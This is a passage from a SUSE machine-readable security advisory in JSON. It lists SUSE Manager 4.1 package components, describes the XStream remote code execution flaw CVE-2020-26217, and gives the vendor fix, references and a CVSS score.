"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-4.1.23-3.18.6.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-4.1.9-4.12.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch"
},
"product_reference": "spacewalk-client-tools-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-config-4.1.5-3.3.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch"
},
"product_reference": "spacewalk-config-4.1.5-3.3.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-html-4.1.23-3.18.6.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-html-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-4.1.30-3.31.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch"
},
"product_reference": "spacewalk-java-4.1.30-3.31.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-config-4.1.30-3.31.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch"
},
"product_reference": "spacewalk-java-config-4.1.30-3.31.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-lib-4.1.30-3.31.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch"
},
"product_reference": "spacewalk-java-lib-4.1.30-3.31.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-postgresql-4.1.30-3.31.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch"
},
"product_reference": "spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-taskomatic-4.1.30-3.31.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch"
},
"product_reference": "spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-utils-4.1.14-3.12.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch"
},
"product_reference": "spacewalk-utils-4.1.14-3.12.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-utils-extras-4.1.14-3.12.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch"
},
"product_reference": "spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "subscription-matcher-0.26-3.6.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch"
},
"product_reference": "subscription-matcher-0.26-3.6.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.1.24-3.20.2.ppc64le as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le"
},
"product_reference": "susemanager-4.1.24-3.20.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.1.24-3.20.2.s390x as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x"
},
"product_reference": "susemanager-4.1.24-3.20.2.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-4.1.24-3.20.2.x86_64 as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64"
},
"product_reference": "susemanager-4.1.24-3.20.2.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-doc-indexes-4.1-11.28.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch"
},
"product_reference": "susemanager-doc-indexes-4.1-11.28.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-docs_en-4.1-11.28.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch"
},
"product_reference": "susemanager-docs_en-4.1-11.28.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-docs_en-pdf-4.1-11.28.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch"
},
"product_reference": "susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-schema-4.1.19-3.24.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch"
},
"product_reference": "susemanager-schema-4.1.19-3.24.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-sls-4.1.21-3.26.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch"
},
"product_reference": "susemanager-sls-4.1.21-3.26.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.1.24-3.20.2.ppc64le as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le"
},
"product_reference": "susemanager-tools-4.1.24-3.20.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.1.24-3.20.2.s390x as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x"
},
"product_reference": "susemanager-tools-4.1.24-3.20.2.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-4.1.24-3.20.2.x86_64 as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64"
},
"product_reference": "susemanager-tools-4.1.24-3.20.2.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-web-libs-4.1.23-3.18.6.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch"
},
"product_reference": "susemanager-web-libs-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-config-modules-4.1.21-3.26.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch"
},
"product_reference": "uyuni-config-modules-4.1.21-3.26.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "xpp3-1.1.4c-11.2.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch"
},
"product_reference": "xpp3-1.1.4c-11.2.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "xpp3-minimal-1.1.4c-11.2.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch"
},
"product_reference": "xpp3-minimal-1.1.4c-11.2.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "xstream-1.4.15-3.5.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
},
"product_reference": "xstream-1.4.15-3.5.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2020-26217",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2020-26217"
}
],
"notes": [
{
"category": "general",
"text": "XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream\u0027s Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2020-26217",
"url": "https://www.suse.com/security/cve/CVE-2020-26217"
},
{
"category": "external",
"summary": "SUSE Bug 1180994 for CVE-2020-26217",
"url": "https://bugzilla.suse.com/1180994"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
